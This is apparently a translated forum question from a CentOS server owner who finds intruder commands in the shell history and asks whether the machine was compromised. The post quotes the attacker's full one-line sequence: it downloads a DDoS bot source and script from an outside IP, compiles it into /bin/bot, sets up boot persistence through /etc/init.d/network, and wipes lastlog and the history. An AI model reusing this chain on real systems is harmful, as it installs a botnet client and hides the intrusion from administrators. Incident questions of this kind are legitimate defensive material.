参见英文答案 >
How do I deal with a compromised server?13个
我们今天使用Putty远程登录我们的CentOS服务器,在使用向上箭头浏览之前的命令时,偶然发现了以下情况:
我们今天使用Putty远程登录我们的CentOS服务器,在使用向上箭头浏览之前的命令时,偶然发现了以下情况:
unset HISTFILE mkdir /usr/lib/tmp cd /usr/lib/tmp wget http://188.72.217.17/mzb.c -o /dev/null wget http://188.72.217.17/windef.h -o /dev/null gcc mzb.c -o /bin/bot -lpthread rm -rf mzb.c rm -rf windef.h wget http://188.72.217.17/botsupport.sh -o /dev/null chmod +x botsupport.sh mv botsupport.sh /etc/init.d/httpd2 cat /etc/init.d/network > /etc/init.d/network.bp echo \#\!/bin/sh > /etc/init.d/network echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network cat /etc/init.d/network.bp >> /etc/init.d/network cat /dev/null > /var/log/lastlog history -c nohup /etc/init.d/httpd2 &
(为了清晰起见,用&换成了换行符)
我永远不会运行这些命令,永远!这是怎么发生的,我的服务器被黑了吗?我立即改变了我的root密码,但是希望有人可以对这里发生的事情做出正面或反面.
我看到源代码中对ddos机器人的引用,我和我的同事都非常关注!
提前致谢!